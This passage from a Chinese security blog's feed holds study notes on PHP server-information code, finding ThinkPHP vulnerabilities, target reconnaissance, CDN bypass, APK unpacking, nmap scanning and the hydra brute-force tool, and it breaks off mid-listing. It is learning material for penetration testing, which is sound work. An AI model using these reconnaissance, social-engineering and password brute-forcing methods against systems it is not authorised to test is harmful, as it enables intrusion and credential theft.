#C3E88D">网站文档目录</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">DOCUMENT_ROOT</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">浏览器信息</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">substr</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">40</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">通信协议</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_PROTOCOL</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">请求方法</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">REQUEST_METHOD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #89DDFF"> </span><span style="color: #676E95; font-style: italic">// 'ThinkPHP版本'=>THINK_VERSION,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">PHP版本</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8">PHP_VERSION</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">上传附件限制</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">ini_get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">upload_max_filesize</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">执行时间限制</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">ini_get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">max_execution_time</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">秒</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">服务器时间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">date</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Y年n月j日 H:i:s</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">北京时间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">gmdate</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Y年n月j日 H:i:s</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF">time</span><span style="color: #89DDFF">()+</span><span style="color: #F78C6C">8</span><span style="color: #89DDFF">*</span><span style="color: #F78C6C">3600</span><span style="color: #89DDFF">),</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">服务器域名/IP</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"> [ </span><span style="color: #89DDFF">'.</span><span style="color: #82AAFF">gethostbyname</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D"> ]</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">剩余空间</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #82AAFF">round</span><span style="color: #89DDFF">((</span><span style="color: #82AAFF">disk_free_space</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">.</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)/(</span><span style="color: #F78C6C">1024</span><span style="color: #89DDFF">*</span><span style="color: #F78C6C">1024</span><span style="color: #89DDFF">)),</span><span style="color: #F78C6C">2</span><span style="color: #89DDFF">)</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">M</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">当前用户的IP地址</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">info</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h3 id="登录验证"><a href="#登录验证" class="headerlink" title="登录验证"></a>登录验证</h3><ul><li>后台管理系统有多个页面文件, 为了方便验证, 一般选用cookie或session进行验证</li><li>cookie安全: 修改, 伪造, 盗取</li><li>session安全: 会话劫持</li><li>验证码</li></ul><h3 id="PHP框架"><a href="#PHP框架" class="headerlink" title="PHP框架"></a>PHP框架</h3><h4 id="thinkphp框架"><a href="#thinkphp框架" class="headerlink" title="thinkphp框架"></a>thinkphp框架</h4><ul><li><p><a href="https://github.com/top-think/think/">top-think/think: ThinkPHP Framework ——十年匠心的高性能PHP框架 (github.com)</a></p></li><li><p><a href="https://doc.thinkphp.cn/">ThinkPHP官方手册</a></p></li></ul><h4 id="漏洞存在情况"><a href="#漏洞存在情况" class="headerlink" title="漏洞存在情况"></a>漏洞存在情况</h4><ul><li>没有按照框架要求的写法去处理(框架写法有<strong>内置安全过滤机制</strong>)</li><li>框架本身存在漏洞</li></ul><h4 id="寻找TP框架漏洞"><a href="#寻找TP框架漏洞" class="headerlink" title="寻找TP框架漏洞"></a>寻找TP框架漏洞</h4><ol><li>看写法</li><li>看历史漏洞->版本</li></ol><h5 id="获取版本信息"><a href="#获取版本信息" class="headerlink" title="获取版本信息"></a>获取版本信息</h5><ul><li><p>黑盒:</p><ul><li>判断是不是TP: 看返回数据包</li><li>看版本: 报错信息</li><li>url地址</li></ul></li><li><p>白盒: 直接看配置文件</p></li></ul>]]></content>
<summary type="html"><h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h3><h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="PHP开发" scheme="https://myprefer.github.io/tags/PHP%E5%BC%80%E5%8F%91/"/>
</entry>
<entry>
<title>信息打点</title>
<link href="https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9.html"/>
<id>https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9.html</id>
<published>2024-02-26T15:22:53.000Z</published>
<updated>2024-03-26T08:26:37.620Z</updated>
<content type="html"><![CDATA[<h3 id="信息点"><a href="#信息点" class="headerlink" title="信息点"></a>信息点</h3><ul><li>基础信息</li><li>操作系统信息</li><li>应用信息</li><li>防护方法信息</li><li>人员信息</li><li>其他信息等</li></ul><h4 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h4><ul><li>中间件</li><li>数据库</li><li>操作系统</li><li>开发语言</li><li>CMS</li></ul><h5 id="开发语言"><a href="#开发语言" class="headerlink" title="开发语言"></a>开发语言</h5><ul><li><p>url文件后缀</p></li><li><p>查看访问数据包</p></li><li><p>搜索引擎搜索</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">site:http://xiaodi8.com index.php</span></span></code></pre></div></li><li><p>搭建组合推算<br>如: apache+php+mysql</p></li></ul><h5 id="中间件"><a href="#中间件" class="headerlink" title="中间件"></a>中间件</h5><ul><li>查看返回数据包</li><li>搭建组合推算</li><li>端口扫描</li></ul><h5 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h5><ul><li>端口扫描(mysql:3306)</li><li>搭建组合推算</li></ul><h5 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>操作系统</h5><ul><li><p>大小写<br>如:</p><ul><li><code>http://xiaodi8.com/index.php</code>可以访问</li><li><code>http://xiaodi8.com/indEx.php</code>无法访问<br>很有可能是Linux系统</li><li>如果对大小写不敏感, 可能是Win系统</li></ul></li><li><p>TTL值<br>默认的TTL值:</p><p>1、WINDOWS NT/2000 TTL:128<br>2、WINDOWS 95/98 TTL:32<br>3、UNIX TTL:255<br>4、LINUX TTL:64<br>5、WIN7 TTL:64</p><p>一般看哪个更接近</p></li></ul><h5 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h5><p><a href="https://www.secpulse.com/archives/124398.html">常见的Web源码泄漏漏洞及其利用 - SecPulse.COM | 安全脉搏</a></p><h6 id="分类"><a href="#分类" class="headerlink" title="分类:"></a>分类:</h6><ul><li>CMS开源</li><li>闭源售卖</li><li>自主研发</li></ul><h6 id="源码泄露原因"><a href="#源码泄露原因" class="headerlink" title="源码泄露原因:"></a>源码泄露原因:</h6><p>1、源码本身的特性<br>2、管理员不好的习惯<br>3、管理员不好的配置<br>4、管理员不好的意识<br>5、管理员资源信息搜集</p><h6 id="获取"><a href="#获取" class="headerlink" title="获取:"></a>获取:</h6><p>方式1:</p><ul><li>直接购买或下载</li></ul><p>方式2:</p><ul><li>composer.]son</li><li>git源码泄露</li><li><del>svn源码泄露</del></li><li>hg源码泄漏</li><li>网站备份压缩文件</li><li>WEB-INF/web.m1泄露(java)</li><li>DS Store文件泄露</li><li><del>SWP文件泄露</del></li><li><del>CVS泄露</del></li><li><del>Bzr泄露</del></li><li>GitHub源码泄漏</li></ul><p>方式3:</p><ul><li>黑产源码</li></ul><h4 id="WAF检测"><a href="#WAF检测" class="headerlink" title="WAF检测"></a>WAF检测</h4><ul><li><p>wafw00f</p><p><a href="https://github.com/EnableSecurity/wafw00f/tree/v2.2.0">EnableSecurity/wafw00f at v2.2.0 (github.com)</a></p></li></ul><h4 id="真实IP"><a href="#真实IP" class="headerlink" title="真实IP"></a>真实IP</h4><h6 id="判断是否有CDN"><a href="#判断是否有CDN" class="headerlink" title="判断是否有CDN"></a>判断是否有CDN</h6><ul><li><a href="https://www.17ce.com/">超级Ping</a></li></ul><h6 id="DNS绕过"><a href="#DNS绕过" class="headerlink" title="DNS绕过"></a>DNS绕过</h6><p><a href="https://zhuanlan.zhihu.com/p/33440472">绕过CDN寻找网站真实IP的方法汇总 - 知乎 (zhihu.com)</a></p><p><a href="https://www.cnblogs.com/blacksunny/p/5771827.html">绕过CDN查看网站真实IP的一些办法 - blacksunny - 博客园 (cnblogs.com)</a></p><p><a href="https://www.cnblogs.com/milantgh/p/5013254.html">查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法 - milantgh - 博客园 (cnblogs.com)</a></p><p><a href="https://get-site-ip.com/">接口查询</a></p><p><a href="https://tools.ipip.net/cdn.php">全球 CDN 服务商查询_专业精准的IP库服务商_IPIP</a></p><ul><li><p><strong>漏洞&遗留文件</strong><br>利用SSRF漏洞让目标服务器向攻击者主动发起请求, 可以监听请求来获取目标IP</p></li><li><p><strong>子域名查询</strong><br>目标服务器的子域名可能没有配置DNS</p></li><li><p><strong>查询国外访问</strong><br>配置CDN时选择地域可能会仅设置成国内生效,此时使用国外地址访问获得真实地址</p></li><li><p><strong>邮件&备案</strong><br>密码找回发送邮件,查看邮件发送方地址找寻, 通过备案信息确认</p></li><li><p>全网扫描<strong>FuckCDN</strong></p><p><a href="https://github.com/Tai7sy/fuckcdn">Tai7sy/fuckcdn: CDN真实IP扫描,易语言开发 (github.com)</a></p><p>扫描全球ip匹配web内容,使用工具匹配扫描网段title信息</p></li><li><p>找phpinfo()之类的<strong>探针</strong></p></li><li><p><strong>查看历史</strong></p><p>目标站点以前可能没有配置CDN</p></li><li><p>CDN本身入手</p><p>利用社工等,得到控制面板的账号密码,那真实ip就很轻易能获取到了。</p></li></ul><h6 id="找到IP后"><a href="#找到IP后" class="headerlink" title="找到IP后"></a>找到IP后</h6><ul><li>HOSTS绑定指向访问<ul><li>(win系统C:\Windows\System32\drivers\etc\hosts)将指定域名指向的ip, 本来是指向节点ip的, 可以修改为指向真实ip</li></ul></li></ul><h3 id="APP"><a href="#APP" class="headerlink" title="APP"></a>APP</h3><h4 id="资产提取"><a href="#资产提取" class="headerlink" title="资产提取"></a>资产提取</h4><h5 id="外在"><a href="#外在" class="headerlink" title="外在"></a>外在</h5><ul><li><p>抓包-Fd&茶杯&Burp</p></li><li><p>封包-封包监听工具</p><p>使用封包监听也可抓到数据包</p></li></ul><h5 id="内在"><a href="#内在" class="headerlink" title="内在"></a>内在</h5><ul><li><p>提取资源-ApplnfoScanner</p><p><a href="https://github.com/kelvinBen/AppInfoScanner">AppInfoScanner</a></p></li><li><p>反编译载入IDEA</p><ul><li><p><a href="https://github.com/Kevin2021-jk/ApkEditor/tree/main?tab=readme-ov-file#%E5%8A%9F%E8%83%BD%E4%BB%8B%E7%BB%8D">安卓修改大师</a></p></li><li><p>使用idea对反编译出的项目进行资源收集</p></li></ul></li></ul><p>资产提取后, 需进一步对代码进行分析</p><h5 id="APP-框架使用-Xposed-JustTrustMe"><a href="#APP-框架使用-Xposed-JustTrustMe" class="headerlink" title="APP-框架使用-Xposed&JustTrustMe"></a>APP-框架使用-Xposed&JustTrustMe</h5><ul><li><p>APP可能存在加壳的情况, 可通过工具判断apk是否加壳<br><a href="https://blog.csdn.net/EXIxiaozhou/article/details/127196615">Android Spider ApkScan-PKID 查壳工具下载使用以及相关技术介绍-CSDN博客</a></p></li><li><p>可通过安装xp框架的方式进行脱壳处理</p><p><a href="https://github.com/halfkiss/ZjDroid">ZjDroid</a></p><p><a href="https://blog.csdn.net/chupu2979/article/details/100616554">Android中Xposed框架篇—基于Xposed的一款脱壳神器ZjDroid工具原理解析-CSDN博客</a></p><p>frida</p></li></ul><h3 id="小程序"><a href="#小程序" class="headerlink" title="小程序"></a>小程序</h3><ul><li>登录PC端/安卓模拟器端微信, fiddler抓包</li></ul><h3 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>工具使用</h3><h4 id="网络空间搜索引擎"><a href="#网络空间搜索引擎" class="headerlink" title="网络空间搜索引擎"></a>网络空间搜索引擎</h4><ul><li><p>Hunt</p><ul><li><a href="https://hunter.qianxin.com/">鹰图平台 (qianxin.com)</a></li></ul></li><li><p>FOFA</p><ul><li>网址: <a href="https://fofa.info/">https://fofa.info/</a></li></ul></li><li><p>360Quake</p><ul><li><a href="https://quake.360.net/quake/#/index">360网络空间测绘 — 因为看见,所以安全</a></li></ul></li><li><p>Shodan</p><ul><li><a href="https://www.shodan.io/">Shodan Search Engine</a></li></ul></li><li><p>Zoomeye</p><ul><li><a href="https://www.zoomeye.org/"> ZoomEye(“钟馗之眼”)</a></li></ul></li></ul><p>可搜索</p><ul><li>关联资产</li><li>特征资产(中间件等)</li><li>资产信息</li></ul><h4 id="自动化工具"><a href="#自动化工具" class="headerlink" title="自动化工具"></a>自动化工具</h4><ul><li><p>Nmap</p><ul><li><p>基本操作</p><ul><li><p>基本快速扫描</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">nmap</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">127.0</span><span style="color: #C3E88D">.0.1</span></span></code></pre></div><p>探测目标主机在1-10000范围内所开放的端口</p></li><li><p>扫描多个目标</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap <一个ip> <另一个ip></span></span></code></pre></div></li><li><p>扫描整个网段</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap 127.0.0.1/24</span></span></code></pre></div></li><li><p>扫描指定端口</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nmap 192.168.3.74 -p80</span></span></code></pre></div></li></ul></li><li><p>实用选项</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-o 启用操作系统检测</span></span><span class="line"><span style="color: #babed8">--top-ports 扫描<number>最常用的端口</span></span><span class="line"><span style="color: #babed8">--proxies <url,port> 用HTTP/SOCK4代理</span></span></code></pre></div></li></ul></li><li><p>Finger-自动识别指纹<br><a href="https://github.com/EASY233/Finger?tab=readme-ov-file#%E5%BC%80%E5%A7%8B">EASY233/Finger: 一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具 (github.com)</a></p></li><li><p>Kunyu:通过调用zoomeyes API实现资产信息和漏洞信息收集<br><a href="https://github.com/knownsec/Kunyu/blob/main/doc/README_CN.md">Kunyu/doc/README_CN.md at main · knownsec/Kunyu (github.com)</a></p></li><li><p>ARL灯塔:自动化信息收集工具</p><p><a href="https://github.com/TophantTechnology/ARL">TophantTechnology/ARL: ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。 协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。 (github.com)</a></p></li><li><p>ShuiZe-水泽: 信息收集自动化工具<br><a href="https://github.com/0x727/ShuiZe_0x727">0x727/ShuiZe_0x727: 信息收集自动化工具 (github.com)</a></p><p><a href="https://blog.csdn.net/baidu_26383841/article/details/132269515">水泽的安装和使用(信息收集自动化工具)_水泽安装-CSDN博客</a></p></li></ul><p><img src="https://i0.imgs.ovh/2024/02/27/uUIGs.png" alt="uUIGs.png"></p>]]></content>
<summary type="html"><h3 id="信息点"><a href="#信息点" class="headerlink" title="信息点"></a>信息点</h3><ul>
<li>基础信息</li>
<li>操作系统信息</li>
<li>应用信息</li>
<li>防护方法信息</li>
<li></summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="信息收集" scheme="https://myprefer.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
</entry>
<entry>
<title>穷举爆破</title>
<link href="https://myprefer.github.io/post/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4.html"/>
<id>https://myprefer.github.io/post/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4.html</id>
<published>2024-02-24T09:07:28.000Z</published>
<updated>2024-03-03T08:47:42.791Z</updated>
<content type="html"><![CDATA[<h4 id="常见的端口服务"><a href="#常见的端口服务" class="headerlink" title="常见的端口服务"></a>常见的端口服务</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">http 80</span></span><span class="line"><span style="color: #babed8">https 443</span></span><span class="line"><span style="color: #babed8">ftp 21</span></span><span class="line"><span style="color: #babed8">ssh 22</span></span><span class="line"><span style="color: #babed8">mysql 3306</span></span><span class="line"><span style="color: #babed8">mssql 1433</span></span><span class="line"><span style="color: #babed8">rsync 873</span></span><span class="line"><span style="color: #babed8">oracle 1521</span></span><span class="line"><span style="color: #babed8">mongo 28017</span></span><span class="line"><span style="color: #babed8">redis 6379</span></span><span class="line"><span style="color: #babed8">tomcat 8080</span></span><span class="line"><span style="color: #babed8">smtp 25</span></span><span class="line"><span style="color: #babed8">POP3 110</span></span><span class="line"><span style="color: #babed8">dns 53</span></span><span class="line"><span style="color: #babed8">telent 23</span></span><span class="line"><span style="color: #babed8">vnc 5900</span></span><span class="line"><span style="color: #babed8">pcanywhere 5632</span></span><span class="line"><span style="color: #babed8">Apache/Tomcat/Nginx/Axis2/resin/jboss 80|8080</span></span><span class="line"><span style="color: #babed8">WebLogic 7001</span></span><span class="line"><span style="color: #babed8">Jenkins 8080 8089</span></span><span class="line"><span style="color: #babed8">SNMP 161</span></span><span class="line"><span style="color: #babed8">Zabbix 8069</span></span><span class="line"><span style="color: #babed8">elasticsearch 9200 9300</span></span><span class="line"><span style="color: #babed8">rdp 3389</span></span></code></pre></div><h4 id="穷举爆破工具九头蛇hydra"><a href="#穷举爆破工具九头蛇hydra" class="headerlink" title="穷举爆破工具九头蛇hydra"></a>穷举爆破工具九头蛇hydra</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">hydra</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span></span><span class="line"><span style="color: #FFCB6B">hydra</span><span style="color: #BABED8"> [[[-l </span><span style="color: #C3E88D">LOGIN</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">-L</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE]</span><span style="color: #BABED8"> [-p </span><span style="color: #C3E88D">PASS</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">-PFILE]]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-C FILE</span><span style="color: #89DDFF">]</span><span style="color: #BABED8">] </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-e ns</span><span style="color: #89DDFF">]</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">[</span><span style="color: #BABED8">-o FILE</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-t TASKS</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-M FILE </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-T TASKS</span><span style="color: #89DDFF">]][</span><span style="color: #BABED8">-w TIME</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-f</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-s PORT</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-S</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-vV</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> server service </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">OPT</span><span style="color: #89DDFF">]</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-R</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">继续从上一次进度接着破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-S</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">采用SSL链接。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-s</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">PORT</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">可通过这个参数指定非默认端口。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-l</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">LOGIN</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定破解的用户,对特定用户破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-L</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定用户名字典。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-p</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">PASS</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">小写,指定密码破解,少用,一般是采用密码字典。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-P</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">大写,指定密码字典。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-e</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ns</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">可选选项,n:空密码试探,s:使用指定用户和密码试探。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-C</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-M</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定目标列表文件一行一条。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-o</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定结果输出文件。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-f</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">TASKS</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">同时运行的线程数,默认为16。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-w</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">TIME</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">设置最大超时的时间,单位秒,默认是30s。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-v</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-V</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">显示详细过程。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">service</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定服务名,支持的服务和协议:telnetftp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pop3[-ntlm]</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">imap[-ntlm]</span><span style="color: #BABED8"> 